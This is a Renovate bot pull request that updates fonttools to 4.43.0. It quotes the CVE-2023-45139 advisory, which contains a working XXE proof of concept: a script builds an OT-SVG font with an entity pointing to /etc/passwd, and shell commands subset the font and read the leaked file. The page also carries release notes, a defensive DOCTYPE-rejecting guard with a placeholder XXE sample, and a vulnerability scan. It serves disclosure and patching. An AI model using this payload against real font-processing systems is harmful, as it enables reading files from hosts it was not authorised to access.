
Update dependency fonttools to v4.43.0 [SECURITY] #541

Closed
wants to merge 1 commit into from

Conversation

renovate[bot]

@renovate renovate bot commented Jan 9, 2024

Mend Renovate

This PR contains the following updates:

Package: fonttools
Change: ==4.28.2 -> ==4.43.0

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2023-45139

Summary

As of fonttools>=4.28.2 the subsetting module has an XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains an SVG table, is parsed.

This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.

PoC

The vulnerability can be reproduced following the below steps on a unix based system.

  1. Build an OT-SVG font which includes an external entity in the SVG table which resolves a local file. In our testing we utilised /etc/passwd for our POC file to include and modified an existing subset integration test to build the POC font - see below.

```python
from string import ascii_letters
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
from fontTools.ttLib import newTable

# SVG document whose internal DTD subset declares an external entity
XXE_SVG = """\
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <g id="glyph1">
    <text font-size="10" x="0" y="10">&test;</text>
  </g>
</svg>
"""

def main():
    # generate a random TTF font with an SVG table
    glyph_order = [".notdef"] + list(ascii_letters)
    pen = TTGlyphPen(glyphSet=None)
    pen.moveTo((0, 0))
    pen.lineTo((0, 500))
    pen.lineTo((500, 500))
    pen.lineTo((500, 0))
    pen.closePath()
    glyph = pen.glyph()
    glyphs = {g: glyph for g in glyph_order}

    fb = FontBuilder(unitsPerEm=1024, isTTF=True)
    fb.setupGlyphOrder(glyph_order)
    fb.setupCharacterMap({ord(c): c for c in ascii_letters})
    fb.setupGlyf(glyphs)
    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
    fb.setupHorizontalHeader()
    fb.setupOS2()
    fb.setupPost()
    fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

    # attach the SVG document to glyph ids 1..12 via the 'SVG ' table
    svg_table = newTable("SVG ")
    svg_table.docList = [
       (XXE_SVG, 1, 12)
    ]
    fb.font["SVG "] = svg_table

    fb.font.save('poc-payload.ttf')

if __name__ == '__main__':
    main()
```

  2. Subset the font with an affected version of fontTools - we tested on fonttools==4.42.1 and fonttools==4.28.2 - using the following flags (which just ensure the malicious glyph is mapped by the font and not discarded in the subsetting process):

```shell
pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs
```

  3. Read the parsed SVG table in the subsetted font:

```shell
ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx
```

Observe the included contents of the /etc/passwd file.

Impact

Note the final severity is dependent on the environment fontTools is running in.

  • The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on

Possible Mitigations

There may be other ways to mitigate the issue, but some suggestions:

  1. Set the resolve_entities=False flag on parsing methods
  2. Consider further methods of disallowing doctype declarations
  3. Consider recursive regex matching

Release Notes

fonttools/fonttools (fonttools)

v4.43.0

  • [subset] Set up lxml XMLParser(resolve_entities=False) when parsing OT-SVG documents to prevent XML External Entity (XXE) attacks (9f61271): https://codeql.github.com/codeql-query-help/python/py-xxe/
  • [varLib.iup] Added workaround for a Cython bug in iup_delta_optimize that was leading to IUP tolerance being incorrectly initialised, resulting in sub-optimal deltas (6012643, cython/cython#5732).
  • [varLib] Added new command-line entry point fonttools varLib.avar to add an avar table to an existing VF from axes mappings in a .designspace file (0a3360e).
  • [instancer] Fixed bug whereby no longer used variation regions were not correctly pruned after VarData optimization (#3268).
  • Added support for Python 3.12 (#3283).

v4.42.1

  • [t1Lib] Fixed several Type 1 issues (#3238, #3240).
  • [otBase/packer] Allow sharing tables reached by different offset sizes (#3241, #3236, 457f11c).
  • [varLib/merger] Fix Cursive attachment merging error when all anchors are NULL (#3248, #3247).
  • [ttLib] Fixed warning when calling addMultilingualName and ttFont parameter was not passed on to findMultilingualName (#3253).

v4.42.0

  • [varLib] Use sentinel value 0xFFFF to mark a glyph advance in hmtx/vmtx as non participating, allowing sparse masters to contain glyphs for variation purposes other than {H,V}VAR (#3235).
  • [varLib/cff] Treat empty glyphs in non-default masters as missing, thus not participating in CFF2 delta computation, similarly to how varLib already treats them for gvar (#3234).
  • Added varLib.avarPlanner script to deduce 'correct' avar v1 axis mappings based on glyph average weights (#3223).

v4.41.1

  • [subset] Fixed perf regression in v4.41.0 by making NameRecordVisitor only visit tables that do contain nameID references (#3213, #3214).
  • [varLib.instancer] Support instancing fonts containing null ConditionSet offsets in FeatureVariationRecords (#3211, #3212).
  • [statisticsPen] Report font glyph-average weight/width and font-wide slant.
  • [fontBuilder] Fixed head.created date incorrectly set to 0 instead of the current timestamp, regression introduced in v4.40.0 (#3210).
  • [varLib.merger] Support sparse CursivePos masters (#3209).

v4.41.0

  • [fontBuilder] Fixed bug in setupOS2 with default panose attribute incorrectly being set to a dict instead of a Panose object (#3201).
  • [name] Added method to removeUnusedNameRecords in the user range (#3185).
  • [varLib.instancer] Fixed issue with L4 instancing (moving default) (#3179).
  • [cffLib] Use latin1 so we can roundtrip non-ASCII in {Full,Font,Family}Name (#3202).
  • [designspaceLib] Mark as optional in docs (as it is in the code).
  • [glyf-1] Fixed drawPoints() bug whereby last cubic segment becomes quadratic (#3189, #3190).
  • [fontBuilder] Propagate the 'hidden' flag to the fvar Axis instance (#3184).
  • [fontBuilder] Update setupAvar() to also support avar 2, fixing _add_avar() call site (#3183).
  • Added new voltLib.voltToFea submodule (originally Tiro Typeworks' "Volto") for converting VOLT OpenType Layout sources to FEA format (#3164).

v4.40.0

  • Published native binary wheels to PyPI for all the python minor versions, platforms and architectures currently supported that would benefit from this. They will include precompiled Cython-accelerated modules (e.g. cu2qu) without requiring them to be compiled from source. The pure-python wheel and source distribution will continue to be published as always (pip will automatically choose them when no binary wheel is available for the given platform, e.g. pypy). Use pip install --no-binary=fonttools fonttools to explicitly request pip to install from the pure-python source.
  • [designspaceLib|varLib] Add initial support for specifying axis mappings and build avar2 table from those (#3123).
  • [feaLib] Support variable ligature caret position (#3130).
  • [varLib|glyf] Added option to --drop-implied-oncurves; test for impliable oncurve points either before or after rounding (#3146, #3147, #3155, #3156).
  • [TTGlyphPointPen] Don't error with empty contours, simply ignore them (#3145).
  • [sfnt] Fixed str vs bytes remnant of py3 transition in code dealing with de/compiling WOFF metadata (#3129).
  • [instancer-solver] Fixed bug when moving default instance with sparse masters (#3139, #3140).
  • [feaLib] Simplify variable scalars that don't vary (#3132).
  • [pens] Added filter pen that explicitly emits closing line when lastPt != movePt (#3100).
  • [varStore] Improve optimize algorithm and better document the algorithm (#3124, #3127).
    Added quantization option (#3126).
  • Added CI workflow config file for building native binary wheels (#3121).
  • [fontBuilder] Added glyphDataFormat=0 option; raise error when glyphs contain cubic outlines but glyphDataFormat was not explicitly set to 1 (#3113, #3119).
  • [subset] Prune emptied GDEF.MarkGlyphSetsDef and remap indices; ensure GDEF is subsetted before GSUB and GPOS (#3114, #3118).
  • [xmlReader] Fixed issue whereby DSIG table data was incorrectly parsed (#3115, #2614).
  • [varLib/merger] Fixed merging of SinglePos with pos=0 (#3111, #3112).
  • [feaLib] Demote "Feature has not been defined" error to a warning when building aalt and referenced feature is empty (#3110).
  • [feaLib] Dedupe multiple substitutions with classes (#3105).

v4.39.4

v4.39.3

v4.39.2

  • [varLib] Fixed regression introduced in 4.39.1 whereby an incomplete 'STAT' table would be built even though a DesignSpace v5 did contain 'STAT' definitions (#3045, #3046).

NOTE: The 4.39.1 distribution was "yanked" from PyPI to prevent users from accidentally upgrading to it.

v4.39.1

v4.39.0

  • [mtiLib] Optionally add Debg debug info for MTI feature builds (#3018).
  • [ttx] Support reading input file from standard input using special - character, similar to existing -o - option to write output to standard output (#3020).
  • [cython] Prevent cython.compiled raise AttributeError if cython not installed properly (#3017).
  • [OS/2] Guard against ZeroDivisionError when calculating xAvgCharWidth in the unlikely scenario no glyph has non-zero advance (#3015).
  • [subset] Recompute xAvgCharWidth independently of --no-prune-unicode-ranges, previously the two options were involuntarily bundled together (#3012).
  • [fontBuilder] Add debug parameter to addOpenTypeFeatures method to add source debugging information to the font in the Debg private table (#3008).
  • [name] Make NameRecord __lt__ comparison not fail on Unicode encoding errors (#3006).
  • [featureVars] Fixed bug in overlayBox (#3003, #3005).
  • [glyf] Added experimental support for cubic bezier curves in TrueType glyf table, as outlined in glyf v1 proposal (#2988):
    https://github.com/harfbuzz/boring-expansion-spec/blob/main/glyf1-cubicOutlines.md
  • Added new qu2cu module and related qu2cuPen, the reverse of cu2qu for converting TrueType quadratic splines to cubic bezier curves (#2993).
  • [glyf] Added experimental support for reading and writing Variable Composites/Components as defined in glyf v1 spec proposal (#2958):
    https://github.com/harfbuzz/boring-expansion-spec/blob/main/glyf1-varComposites.md.
  • [pens] Added addVarComponent method to pen protocols' base classes, which pens can implement to handle varcomponents (by default they get decomposed).
  • [misc.transform] Added DecomposedTransform class which implements an affine transformation with separate translate, rotation, scale, skew, and transformation-center components (#2598).
  • [sbix] Ensure Glyph.referenceGlyphName is set; fixes error after dumping and re-compiling sbix table with 'dupe' glyphs (#2984).
  • [feaLib] Be cleverer when merging chained single substitutions into same lookup when they are specified using the inline notation (#2150, #2974).
  • [instancer] Clamp user-inputted axis ranges to those of fvar (#2959).
  • [otBase/subset] Define __getstate__ for BaseTable so that a copied/pickled 'lazy' object gets its own OTTableReader to read from; incidentally fixes a bug while subsetting COLRv1 table containing ClipBoxes on python 3.11 (#2965, #2968).
  • [sbix] Handle glyphs with "dupe" graphic type on compile correctly (#2963).
  • [glyf] endPointsOfContours field should be unsigned! Kudos to behdad for spotting one of the oldest bugs in FT. Probably nobody has ever dared to make glyphs with more than 32767 points... (#2957).
  • [feaLib] Fixed handling of ignore statements with unmarked glyphs to match makeotf behavior, which assumes the first glyph is marked (#2950).
  • Reformatted code with black and enforce new code style via CI check (#2925).
  • [feaLib] Sort name table entries following OT spec prescribed order in the builder (#2927).
  • [cu2quPen] Add Cu2QuMultiPen that converts multiple outlines at a time in interpolation compatible way; its methods take a list of tuples arguments that would normally be passed to individual segment pens, and at the end it dispatches the converted outlines to each pen (#2912).
  • [reverseContourPen/ttGlyphPen] Add outputImpliedClosingLine option (#2913, #2914, #2921, #2922, #2995).
  • [gvar] Avoid expanding all glyphs unnecessarily upon compile (#2918).
  • [scaleUpem] Fixed bug whereby CFF2 vsindex was scaled; it should not (#2893, #2894).
  • [designspaceLib] Add DS.getAxisByTag and refactor getAxis (#2891).
  • [unicodedata] map Zmth<->math in ot_tag_{to,from}_script (#1737, #2889).
  • [woff2] Support encoding/decoding OVERLAP_SIMPLE glyf flags (#2576, #2884).
  • [instancer] Update OS/2 class and post.italicAngle when default moved (L4).
  • Dropped support for Python 3.7 which reached EOL, fontTools requires 3.8+.
  • [instancer] Fixed instantiateFeatureVariations logic when a rule range becomes default-applicable (#2737, #2880).
  • [ttLib] Add main to ttFont and ttCollection that just decompile and re-compile the input font (#2869).
  • [featureVars] Insert 'rvrn' lookup at the beginning of LookupList, to work around bug in Apple implementation of 'rvrn' feature which the spec says it should be processed early whereas on macOS 10.15 it follows lookup order (#2140, #2867).
  • [instancer/mutator] Remove 'DSIG' table if present.
  • [svgPathPen] Don't close path in endPath(), assume open unless closePath() (#2089, #2865).

v4.38.0

  • [varLib.instancer] Added support for L4 instancing, i.e. moving the default value of an axis while keeping it variable. Thanks Behdad! (#2728, #2861).
    It's now also possible to restrict an axis min/max values beyond the current default value, e.g. a font wght has min=100, def=400, max=900 and you want a partial VF that only varies between 500 and 700, you can now do that. You can either specify two min/max values (wght=500:700), and the new default will be set to either the minimum or maximum, depending on which one is closer to the current default (e.g. 500 in this case). Or you can specify three values (e.g. wght=500:600:700) to set the new default value explicitly.
  • [otlLib/featureVars] Set a few Count values so one doesn't need to compile the font to update them (#2860).
  • [varLib.models] Make extrapolation work for 2-master models as well where one master is at the default location (#2843, #2846).
    Add optional extrapolate=False to normalizeLocation() (#2847, #2849).
  • [varLib.cff] Fixed sub-optimal packing of CFF2 deltas by no longer rounding them to integer (#2838).
  • [scaleUpem] Calculate numShorts in VarData after scale; handle CFF hintmasks (#2840).

v4.37.4

  • [subset] Keep nameIDs used by CPAL palette entry labels (#2837).
  • [varLib] Avoid negative hmtx values when creating font from variable CFF2 font (#2827).
  • [instancer] Don't prune stat.ElidedFallbackNameID (#2828).
  • [unicodedata] Update Scripts/Blocks to Unicode 15.0 (#2833).

v4.37.3

  • Fix arguments in calls to (glyf) glyph.draw() and drawPoints(), whereby offset wasn't correctly passed down; this fix also exposed a second bug, where lsb and tsb were not set (#2824, #2825, adobe-type-tools/afdko#1560).

v4.37.2

v4.37.1

  • [subset] Fixed regression introduced with v4.37.0 while subsetting the VarStore of HVAR and VVAR tables, whereby an AttributeError: subset_varidxes was thrown because an apparently unused import statement (with the side-effect of dynamically binding that subset_varidxes method to the VarStore class) had been accidentally deleted in an unrelated PR (#2769, #2773).
  • [pens] Added cairoPen (#2768).
  • [gvar] Read gvar more lazily by not parsing all of the glyf table (#2771).
  • [ttGlyphSet] Make drawPoints(pointPen) method work for CFF fonts as well via adapter pen (#2770).

v4.37.0

v4.36.0

  • [varLib.models] Use a simpler model that generates narrower "tents" (regions, master supports) whenever possible: specifically when any two axes that actively "cooperate" (have masters at non-zero positions for both axes) have a complete set of intermediates.
    The simpler algorithm produces fewer overlapping regions and behaves better with respect to rounding at the peak positions than the generic solver, always matching intermediate masters exactly, instead of maximally 0.5 units off. This may be useful when 100% metrics compatibility is desired (#2218, #2717).
  • [feaLib] Remove warning about GDEF not being built when explicitly not requested; don't build one unconditionally even when not requested (#2744, also works around #2747).
  • [ttFont] TTFont.getGlyphSet method now supports selecting a location that represents an instance of a variable font (supports both user-scale and normalized axes coordinates via the normalized=False parameter). Currently this only works for TrueType-flavored variable fonts (#2738).

v4.35.0

  • [otData/otConverters] Added support for 'biased' PaintSweepGradient start/end angles to match latest COLRv1 spec (#2743).
  • [varLib.instancer] Fixed bug in _instantiateFeatureVariations when at the same time pinning one axis and restricting the range of a subsequent axis; the wrong axis tag was being used in the latter step (as the records' axisIdx was updated in the preceding step but looked up using the old axes order in the following step) (#2733, #2734).
  • [mtiLib] Pad script tags with space when less than 4 char long (#1727).
  • [merge] Use '.' instead of '#' in duplicate glyph names (#2742).
  • [gvar] Added support for lazily loading glyph variations (#2741).
  • [varLib] In build_many, we forgot to pass on colr_layer_reuse parameter to the build method (#2730).
  • [svgPathPen] Add a main that prints SVG for input text (6df779f).
  • [cffLib.width] Fixed off-by-one in optimized values; previous code didn't match the code block above it (2963fa5).
  • [varLib.interpolatable] Support reading .designspace and .glyphs files (via optional glyphsLib).
  • Compile some modules with Cython when available and building/installing fonttools from source: varLib.iup (35% faster), pens.momentsPen (makes varLib.interpolatable 3x faster).
  • [feaLib] Allow features to be built for VF without also building a GDEF table (e.g. only build GSUB); warn when GDEF would be needed but isn't requested (#2705, #2694).
  • [otBase] Fixed AttributeError when uharfbuzz < 0.23.0 and repack method is missing (32aa8ea).
    Use new uharfbuzz.repack_with_tag when available (since uharfbuzz>=0.30.0), enables table-specific optimizations to be performed during repacking (#2724).
  • [statisticsPen] By default report all glyphs (4139d89). Avoid division-by-zero (52b28f9).
  • [feaLib] Added missing required argument to FeatureLibError exception (#2693).
  • [varLib.merge] Fixed error during error reporting (#2689). Fixed undefined NotANone variable (#2714).

v4.34.4

  • Fixed typo in varLib/merger.py that causes NameError merging COLR glyphs containing more than 255 layers (#2685).

v4.34.3

  • [designspaceLib] Don't make up bad PS names when no STAT data (#2684).

v4.34.2

  • [varStore/subset] fixed KeyError exception to do with NO_VARIATION_INDEX while subsetting varidxes in GPOS/GDEF (a08140d).

v4.34.1

  • [instancer] When optimizing HVAR/VVAR VarStore, use_NO_VARIATION_INDEX=False to avoid including NO_VARIATION_INDEX in AdvWidthMap, RsbMap, LsbMap mappings, which would push the VarIdx width to maximum (4bytes), which is not desirable. This also fixes a hard crash when attempting to subset a varfont after it had been partially instanced with use_NO_VARIATION_INDEX=True.

v4.34.0

  • [instancer] Set RIBBI bits in head and OS/2 table when cutting instances and the subfamily nameID=2 contains strings like 'Italic' or 'Bold' (#2673).
  • [otTraverse] Added module containing methods for traversing trees of otData tables (#2660).
  • [otTables] Made DeltaSetIndexMap TTX dump less verbose by omitting no-op entries (#2660).
  • [colorLib.builder] Added option to disable PaintColrLayers's reuse of layers from LayerList (#2660).
  • [varLib] Added support for merging multiple master COLRv1 tables into a variable COLR table (#2660, #2328).
    Base color glyphs of same name in different masters must have identical paint graph structure (incl. number of layers, palette indices, number of color line stops, corresponding paint formats at each level of the graph), but can differ in the variable fields (e.g. PaintSolid.Alpha). PaintVar* tables are produced when this happens and a VarStore/DeltaSetIndexMap is added to the variable COLR table. It is possible for non-default masters to be 'sparse', i.e. omit some of the color glyphs present in the default master.
  • [feaLib] Let the Parser set nameIDs 1 through 6 that were previously reserved (#2675).
  • [varLib.varStore] Support NO_VARIATION_INDEX in optimizer and instancer.
  • [feaLib] Show all missing glyphs at once at end of parsing (#2665).
  • [varLib.iup] Rewrite force-set conditions and limit DP loopback length (#2651). For Noto Sans, IUP time drops from 23s down to 9s, with only a slight size increase in the final font. This basically turns the algorithm from O(n^3) into O(n).
  • [featureVars] Report about missing glyphs in substitution rules (#2654).
  • [mutator/instancer] Added CLI flag to --no-recalc-timestamp (#2649).
  • [SVG] Allow individual SVG documents in SVG OT table to be compressed or uncompressed, and remember that when roundtripping to/from ttx. The SVG.docList is now a list of SVGDocument namedtuple-like dataclass containing an extra compressed field, and no longer a bare 3-tuple (#2645).
  • [designspaceLib] Check for descriptor types with hasattr() to allow custom classes that don't inherit the default descriptors (#2634).
  • [subset] Enable sharing across subtables of extension lookups for harfbuzz packing (#2626).
    Updated how table packing falls back to fontTools from harfbuzz (#2668).
  • [subset] Updated default feature tags following current Harfbuzz (#2637).
  • [svgLib] Fixed regex for real number to support e.g. 1e-4 in addition to 1.0e-4. Support parsing negative rx, ry on arc commands (#2596, #2611).
  • [subset] Fixed subsetting SinglePosFormat2 when ValueFormat=0 (#2603).

v4.33.3

  • [designspaceLib] Fixed typo in deepcopyExceptFonts method, preventing font references from being transferred (#2600).
    Fixed another typo in the name of Range dataclass's __post_init__ magic method (#2597).

v4.33.2

  • [otBase] Make logging less verbose when harfbuzz fails to serialize (#2593).
    Do not exit at the first failure but continue attempting to fix offset overflow error using the pure-python serializer even when the USE_HARFBUZZ_REPACKER option was explicitly set to True. This is normal with fonts with relatively large tables, at least until hb.repack implements proper table splitting.

v4.33.1

  • [otlLib] Put back the FONTTOOLS_GPOS_COMPACT_MODE environment variable to fix regression in ufo2ft (and thus fontmake) introduced with v4.33.0 (#2592, #2593).
    This is deprecated and will be removed once ufo2ft gets updated to use the new config setup.

v4.33.0

  • [OS/2 / merge] Automatically recalculate OS/2.xAvgCharWidth after merging fonts with fontTools.merge (#2591, #2538).
  • [misc/config] Added fontTools.misc.configTools module, a generic configuration system (#2416, #2349).
    Added fontTools.config module, a fontTools-specific configuration system using configTools above.
    Attached a Config object to TTFont.
  • [otlLib] Replaced environment variable for GPOS compression level with an equivalent option using the new config system.
  • [designspaceLib] Incremented format version to 5.0 (#2436).
    Added discrete axes, variable fonts, STAT information, either design- or user-space location on instances.
    Added fontTools.designspaceLib.split module to split a designspace into sub-spaces that interpolate and that represent the variable fonts listed in the document.
    Made instance names optional and allow computing them from STAT data instead.
    Added fontTools.designspaceLib.statNames module.
    Allow instances to have the same location as a previously defined STAT label.
    Deprecated some attributes:
    SourceDescriptor: copyLib, copyInfo, copyGroups, copyFeatures.
    InstanceDescriptor: kerning, info; glyphs: use rules or sparse sources.
    For both, location: use the more explicit designLocation.
    Note: all are soft deprecations and existing code should keep working.
    Updated documentation for Python methods and the XML format.
  • [varLib] Added build_many to build several variable fonts from a single designspace document (#2436).
    Added fontTools.varLib.stat module to build STAT tables from a designspace document.
  • [otBase] Try to use the Harfbuzz Repacker for packing GSUB/GPOS tables when uharfbuzz python bindings are available (#2552). Disable it by setting the "fontTools.ttLib.tables.otBase:USE_HARFBUZZ_REPACKER" config option to False. If the option is set explicitly to True but uharfbuzz can't be imported or fails to serialize for any reasons, an error will be raised (ImportError or uharfbuzz errors).
  • [CFF/T2] Ensure that pen.closePath() gets called for CFF2 charstrings (#2577).
    Handle implicit CFF2 closePath within T2OutlineExtractor (#2580).

v4.32.0

  • [otlLib] Disable GPOS7 optimization to work around bug in Apple CoreText. Always force Chaining GPOS8 for now (#2540).
  • [glifLib] Added outputImpliedClosingLine=False parameter to Glyph.draw(), to control behaviour of PointToSegmentPen (6b4e2e7).
  • [varLib.interpolatable] Check for wrong contour starting point (#2571).
  • [cffLib] Remove leftover GlobalState class and fix calls to TopDictIndex() (#2569, #2570).
  • [instancer] Clear AxisValueArray if it is empty after instantiating (#2563).

v4.31.2

  • [varLib] fix instantiation of GPOS SinglePos values (#2555).

v4.31.1

  • [subset] fix subsetting OT-SVG when glyph id attribute is on the root <svg> element (#2553).

v4.31.0

  • [ttCollection] Fixed 'ResourceWarning: unclosed file' warning (#2549).
  • [varLib.merger] Handle merging SinglePos with valueformat=0 (#2550).
  • [ttFont] Update glyf's glyphOrder when calling TTFont.setGlyphOrder() (#2544).
  • [ttFont] Added ensureDecompiled method to load all tables irrespective of the lazy attribute (#2551).
  • [otBase] Added iterSubTable method to iterate over BaseTable's children of type BaseTable; useful for traversing a tree of otTables (#2551).

v4.30.0

  • [varLib] Added debug logger showing the glyph name for which gvar is built (#2542).
  • [varLib.errors] Fixed undefined names in FoundANone and UnsupportedFormat exceptions (ac4d561).
  • [otlLib.builder] Added windowsNames and macNames (bool) parameters to the buildStatTable function, so that one can select whether to only add one or both of the two sets (#2528).
  • [t1Lib] Added the ability to recreate PostScript stream (#2504).
  • [name] Added getFirstDebugName, getBest{Family,SubFamily,Full}Name methods (#2526).

v4.29.1

  • [colorLib] Fixed rounding issue with radial gradient's start/end circles inside one another (#2521).
  • [freetypePen] Handle rotate/skew transform when auto-computing width/height of the buffer; raise PenError when missing moveTo (#2517).

v4.29.0

  • [ufoLib] Fixed illegal characters and expanded reserved filenames (#2506).
  • [COLRv1] Don't emit useless PaintColrLayers of length=1 in LayerListBuilder (#2513).
  • [ttx] Removed legacy waitForKeyPress method on Windows (#2509).
  • [pens] Added FreeTypePen that uses freetype-py and the pen protocol for rasterizing outline paths (#2494).
  • [unicodedata] Updated the script direction list to Unicode 14.0 (#2484).
    Bumped unicodedata2 dependency to 14.0 (#2499).
  • [psLib] Fixed type of fontName in suckfont (#2496).

v4.28.5

  • [svgPathPen] Continuation of #2471: make sure all occurrences of str() are now replaced with user-defined ntos callable.
  • [merge] Refactored code into submodules, plus several bugfixes and improvements (#2473, #2475, #2476):
    • fixed duplicate-glyph-resolution GSUB-lookup generation code;
    • use t

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.
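The advisory above lists "disallow doctype declarations" as a mitigation, and the v4.43.0 note records fontTools' actual fix (`lxml XMLParser(resolve_entities=False)`). The block below is an added example of the stricter DOCTYPE-rejection approach using only the Python standard library; it is not fontTools code and not part of the advisory. The function names (`check_no_doctype`, `glyph_ids_from_svg`, `is_safe_svg`), the two sample SVG documents and the `file:///placeholder/...` URI are all constructed for this example.

```python
# Added example (not fontTools code): a DOCTYPE/entity tripwire for OT-SVG
# documents, in the spirit of mitigation 2 in the advisory. fontTools v4.43.0
# instead keeps the document and passes resolve_entities=False to lxml's
# XMLParser; this guard is the stricter, stdlib-only alternative.
import xml.parsers.expat
import xml.etree.ElementTree as ET


class UnsafeSvgDocument(ValueError):
    """Raised when an SVG document declares a DOCTYPE or an entity."""


def check_no_doctype(svg_bytes: bytes) -> None:
    """Abort as soon as expat reports a DOCTYPE or entity declaration.

    Expat performs no I/O of its own: an external entity is only fetched if
    the application installs an ExternalEntityRefHandler and reads the
    resource itself. This guard installs none, so nothing the document
    references is ever opened, and the DOCTYPE handler fires before any
    <!ENTITY> in the internal subset is reached.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeSvgDocument(f"DOCTYPE {name!r} is not allowed in an OT-SVG document")

    def on_entity_decl(name, *_):
        raise UnsafeSvgDocument(f"entity declaration {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # An exception raised inside a handler propagates out of Parse().
    parser.Parse(svg_bytes, True)


def glyph_ids_from_svg(svg_bytes: bytes) -> list:
    """Run the guard, then collect the glyph ids a subsetter would look at."""
    check_no_doctype(svg_bytes)
    root = ET.fromstring(svg_bytes)
    return [el.get("id") for el in root.iter() if el.get("id", "").startswith("glyph")]


def is_safe_svg(svg_bytes: bytes) -> bool:
    """True if the document passes the guard, False if it carries a DOCTYPE/entity."""
    try:
        check_no_doctype(svg_bytes)
    except UnsafeSvgDocument:
        return False
    return True


# Constructed inputs. SAFE_SVG is an ordinary OT-SVG glyph document; XXE_SVG
# has the same shape as the advisory's PoC but points at a placeholder path.
SAFE_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <g id="glyph1"><rect x="0" y="0" width="500" height="500"/></g>
  <g id="glyph2"><circle cx="250" cy="250" r="200"/></g>
</svg>
"""

XXE_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY ext SYSTEM 'file:///placeholder/path/secret.txt'>]>
<svg xmlns="http://www.w3.org/2000/svg">
  <g id="glyph1"><text x="0" y="10">&ext;</text></g>
</svg>
"""

if __name__ == "__main__":
    print(glyph_ids_from_svg(SAFE_SVG))  # ['glyph1', 'glyph2']
    print(is_safe_svg(XXE_SVG))          # False
```

Rejecting every DOCTYPE is stricter than the shipped fix: some SVG editors emit a harmless `<!DOCTYPE svg PUBLIC ...>` header, and those documents would be refused here as well, whereas `resolve_entities=False` keeps them and only stops entity expansion. Which trade-off is right depends on whether the fonts being subsetted come from untrusted sources.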


guardrails bot commented Jan 9, 2024

⚠️ We detected 12 security issues in this pull request:

Vulnerable Libraries (12)
Severity Details
High pkg:pypi/[email protected] (t) upgrade to: 70f906c51ce49c485f1d355703e9cc3386b1cc2b,afd63b16170b7c047f5758eb910c416511e9c965,2.2.5,2.3.2
N/A pkg:pypi/[email protected] (t) upgrade to: 3.1.32
High pkg:pypi/[email protected] (t) upgrade to: 925760291d6efec64fda6e9dd1fd9cfbd5be068c,1.2.2
High pkg:pypi/[email protected] (t) upgrade to: 26.2.1,2.88.6,0.1.8,22.3.24,24.8.3,25.8.1,0.9.3,27.0.0-beta.2,10.0.1,0.2.6
High pkg:pypi/[email protected] (t) upgrade to: 2.4.0
Critical pkg:pypi/[email protected] (t) upgrade to: 9a3a981d70d2e9ec3344b5192f86fcaf3210cd85,2.1.1
High pkg:pypi/[email protected] (t) upgrade to: 70f906c51ce49c485f1d355703e9cc3386b1cc2b,afd63b16170b7c047f5758eb910c416511e9c965,2.2.5,2.3.2
Medium pkg:pypi/[email protected] (t) upgrade to: 3.1.35
High pkg:pypi/[email protected] (t) upgrade to: 1.2.2,925760291d6efec64fda6e9dd1fd9cfbd5be068c
High pkg:pypi/[email protected] (t) upgrade to: 24.8.3,25.8.1,2.88.6,10.0.1,0.2.6,22.3.24,0.9.3,26.2.1,27.0.0-beta.2,0.1.8
High pkg:pypi/[email protected] (t) upgrade to: 2.4.0
Critical pkg:pypi/[email protected] (t) upgrade to: 9a3a981d70d2e9ec3344b5192f86fcaf3210cd85,2.1.1

More info on how to fix Vulnerable Libraries in Python.



Stale pull request message

Author

renovate bot commented Mar 18, 2024

Renovate Ignore Notification

Because you closed this PR without merging, Renovate will ignore this update (==4.43.0). You will get a PR once a newer version is released. To ignore this dependency forever, add it to the ignoreDeps array of your Renovate config.

If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR.

@renovate renovate bot deleted the renovate/pypi-fonttools-vulnerability branch March 18, 2024 02:30